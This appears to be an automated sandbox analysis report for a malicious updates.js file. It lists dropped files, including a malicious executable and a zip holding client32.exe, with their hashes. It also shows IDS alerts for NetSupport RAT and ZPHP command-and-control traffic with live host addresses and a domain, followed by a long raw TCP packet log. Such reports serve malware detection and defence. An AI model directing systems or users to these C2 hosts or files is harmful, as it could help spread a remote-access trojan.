                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):63864
                                                                            Entropy (8bit):6.446503462786185
                                                                            Encrypted:false
                                                                            SSDEEP:1536:Tf6fvDuNcAjJMBUHYBlXU1wT2JFqy9BQhiK:D6f7cjJ4U4I1jFqy92hiK
                                                                            MD5:6FCA49B85AA38EE016E39E14B9F9D6D9
                                                                            SHA1:B0D689C70E91D5600CCC2A4E533FF89BF4CA388B
                                                                            SHA-256:FEDD609A16C717DB9BEA3072BED41E79B564C4BC97F959208BFA52FB3C9FA814
                                                                            SHA-512:F9C90029FF3DEA84DF853DB63DACE97D1C835A8CF7B6A6227A5B6DB4ABE25E9912DFED6967A88A128D11AB584663E099BF80C50DD879242432312961C0CFE622
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 24%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$U..`4..`4..`4..{.D.q4..{.p.54..iLI.e4..`4..74..{.q.}4..{.@.a4..{.G.a4..Rich`4..................PE..L......U.....................J.......!............@.......................... .......o....@....................................<.......T...............x)..............................................@...............@............................text............................... ..`.rdata...%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\GRDCWLLI20\tttt.zip

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                            Category:dropped
                                                                            Size (bytes):3731115
                                                                            Entropy (8bit):7.998188939894259
                                                                            Encrypted:true
                                                                            SSDEEP:98304:E1NFXa/hRFY89YYc9jh23redpmQR6Q6/mizhpX6mD:UNSxYoY59V0redpmQR6jhpl
                                                                            MD5:1D982823F1D159185450F98204AC32EA
                                                                            SHA1:698B10CF72E8D12D047872746EB1E882FF2DD15A
                                                                            SHA-256:7A49D805AFFC15E1755D0DB339705147FACA5A4254C20B9169529FD1CC5FB2D0
                                                                            SHA-512:C7F11F4C074E35A66D6549CFA8050199D610DFCE253C799DCF1647DBCB5896AB731470EF24021C460D572F02C1AAEA98005C6F97DED55C9E98FD84B3E1ECDF7F
                                                                            Malicious:false
                                                                            Preview:PK.........DWW..%.&l..........client32.exe.|.xT.....N..".R....A.W..@........Tj.$...Q.@... ...7!...@..iJ.......;3....R..~.....;g...3gfnx...T.@......b../....d.@...n{...ts....5d.....]%.i..v...:3lZ..i]G.9v.:...\__...F.).C....(..B..t..P.f....&..9..e.k9.:.K.X...8..`.@...Oph.@W...B.p....N.]A.....A^...!..Y..T...+..t........`..KUg.....`..]w..=k...g...7.......4<..=f..|..8T.."...z..:..ae>s.L.(....f.U.%=.).Iq.....T..px-..8G.G...`8.>{#.=....&B..G..)t........uY:R0..C.....C.........G......1r.e..K5HMop..ZJ..6.&...fM.........m....G..W.I0....hb.."NDS5...>MTz-.".i.....v..[..JC.dC........^4....4.W.U.SZ.'..........O...C.O.+..X...Cs.)S.L`3'8t.....Y..Te....~aS.G...M......9..g......0}.|-.;..N%....Hi......$.....kC..t..`..,..!&..X..$.6k..v....o_.I.......x......?_..'.A..../`S.b...u.].....t..9.6...g.l..|.2...Nte.}.N....]........)d..Q{.>g.p?G.O...g.......S.Z*.-.....^.......[......V..i...V.oh.~l+......R9.}W.F..q....4...._`G.CK..u.@l.....7l.W/..b.&... H.1..I.........

                                                                            Static File Info

                                                                            General

                                                                            File type:ASCII text
                                                                            Entropy (8bit):4.952347714265242
                                                                            TrID:
                                                                            • Java Script (8502/1) 68.00%
                                                                            • Digital Micrograph Script (4001/1) 32.00%
                                                                            File name:updates.js
                                                                            File size:7'688'860 bytes
                                                                            MD5:2826502a26311bbe395d5ab565114330
                                                                            SHA1:1764ea00a1262c07b13d0c4b059e88e57650dfc4
                                                                            SHA256:65ab8ed555628693952b1fc385feca757b0a689981128d848f2c39a52e7da1e9
                                                                            SHA512:578eaf54cab019a8f1b166b1da0b5580ee8081bfd1629fe938e366ac855b501016d84e5567008069d900a970247577ae998191d028ce5904dd7c0a7bee451239
                                                                            SSDEEP:49152:47h4zjCxb7qHlp4BOlN0KFhcuscyEMzYsm7++86mn3Ef/Vf7GI0/3qp6RCgScEQu:1
                                                                            TLSH:EC76E40DAEF71091A923313C8FAF640AB6748017190ADD143D9DA3945FA953867FEFE8
                                                                            File Content Preview:/*.* Licensed to the Apache Software Foundation (ASF) under one.* or more contributor license agreements. See the NOTICE file.* distributed with this work for additional information.* regarding copyright ownership. The ASF licenses this file.* to you un

                                                                            File Icon

                                                                            Icon Hash:68d69b8bb6aa9a86

                                                                            Network Behavior

                                                                            Snort IDS Alerts

                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                            07/16/24-22:29:48.775589UDP2054426ET TROJAN ZPHP CnC Domain in DNS Lookup (dfwreds .com)5801253192.168.2.41.1.1.1

                                                                            Suricata IDS Alerts

                                                                            TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                                            2024-07-16T22:29:37.087965+0200TCP2827745ETPRO MALWARE NetSupport RAT CnC Activity49731443192.168.2.494.158.245.103
                                                                            2024-07-16T22:29:37.087965+0200TCP2857473ETPRO MALWARE Malicious NetSupport Rat CnC Checkin49731443192.168.2.494.158.245.103
                                                                            2024-07-16T22:29:54.986481+0200TCP2034559ET POLICY NetSupport GeoLocation Lookup Request4973280192.168.2.4104.26.0.231
                                                                            2024-07-16T22:30:00.900003+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973320.12.23.50192.168.2.4
                                                                            2024-07-16T22:30:43.615970+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4435209820.12.23.50192.168.2.4
                                                                            2024-07-16T22:29:48.775589+0200UDP2054426ET MALWARE ZPHP CnC Domain in DNS Lookup (dfwreds .com)5801253192.168.2.41.1.1.1

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jul 16, 2024 22:29:48.865631104 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:48.871773958 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:48.871923923 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:48.873991966 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:48.880629063 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.385452032 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.385485888 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.385503054 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.385523081 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.385538101 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.385540009 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.385581970 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.385649920 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.385667086 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.385682106 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.385700941 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.385715961 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.385858059 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.385875940 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.385920048 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.390364885 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.390450001 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.390465975 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.390502930 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.431627035 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.474117994 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.474159002 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.474216938 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.474224091 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.474251032 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.474287033 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.474292040 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.474323034 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.474358082 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.474369049 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.475030899 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.475083113 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.475086927 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.475156069 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.475189924 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.475202084 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.475225925 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.475276947 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.475352049 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.475948095 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.475994110 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.476007938 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.476042032 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.476083040 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.476119995 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.476598978 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.476632118 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.476648092 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.476686001 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.476731062 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.476767063 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.476802111 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.476846933 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.477430105 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.479228973 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.479265928 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.479296923 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.479300976 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.479352951 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.563132048 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.563272953 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.563328028 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.563342094 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.563361883 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.563411951 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.563441992 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.563474894 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.563508034 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.563525915 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.563541889 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.563591957 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.563805103 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.563838005 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.563870907 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.563889980 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.563908100 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.563958883 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.564084053 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.564116001 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.564148903 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.564161062 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.564182997 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.564218998 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.564234018 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.564436913 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.564471006 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.564497948 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.564630032 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.564678907 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.564692020 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.564712048 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.564762115 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.564763069 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.564795971 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.564829111 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.564843893 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.564863920 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.564901114 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.564912081 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.565217972 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.565251112 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.565269947 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.565284014 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.565319061 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.565331936 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.565588951 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.565622091 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.565642118 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.565654993 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.565687895 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.565701962 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.565721989 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.565769911 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.565953016 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.566003084 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.566035986 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.566052914 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.566068888 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.566102982 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.566121101 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.566135883 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.566169977 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.566179991 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.566432953 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.566485882 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.566485882 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.566519022 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.566553116 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.566566944 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.566585064 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.566637039 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.653176069 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.653223991 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.653260946 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.653295994 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.653433084 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.653466940 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.653495073 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.653501034 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.653539896 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.653558969 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.653574944 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.653609991 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.653626919 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.653688908 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.653723001 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.653738976 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.653791904 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.653842926 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.653846025 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.653879881 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.653917074 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.653925896 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.654164076 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.654198885 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.654217958 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.654321909 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.654355049 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.654371023 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.654388905 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.654422045 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.654437065 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.654454947 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.654486895 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.654509068 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.654522896 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.654577971 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.654829979 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.654987097 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.655019999 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.655036926 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.655054092 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.655087948 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.655102968 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.655121088 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.655154943 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.655169964 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.655188084 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.655221939 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.655239105 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.655256033 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.655303001 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.655662060 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.655694962 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.655745983 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.655750990 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.655802011 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.655834913 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.655846119 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.655869007 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.655901909 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.655919075 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.655936003 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.655971050 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.655982018 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.656347990 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.656379938 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.656399012 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.656431913 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.656465054 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.656477928 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.656523943 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.656558037 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.656575918 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.656590939 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.656622887 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.656636953 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.656656981 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.656691074 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.656701088 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.656974077 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.657026052 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.657180071 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.657212973 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.657246113 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.657262087 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.657279968 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.657313108 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.657331944 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.657351017 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.657385111 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.657401085 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.657419920 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.657453060 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.657466888 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.657485008 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.657519102 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.657530069 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.657552958 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.657596111 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.658049107 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.658098936 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.658149958 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.658152103 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.658185959 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.658220053 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.658231974 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.658252954 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.658286095 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.658302069 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.658319950 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.658353090 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.658366919 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.658385992 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.658421040 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.658437014 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.658461094 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.658508062 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.659270048 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.659307003 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.659339905 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.659357071 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.659373999 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.659429073 CEST4973080192.168.2.423.227.193.59
                                                                            Jul 16, 2024 22:29:49.695075035 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.695146084 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.695162058 CEST804973023.227.193.59192.168.2.4
                                                                            Jul 16, 2024 22:29:49.695231915 CEST4973080192.168.2.423.227.193.59
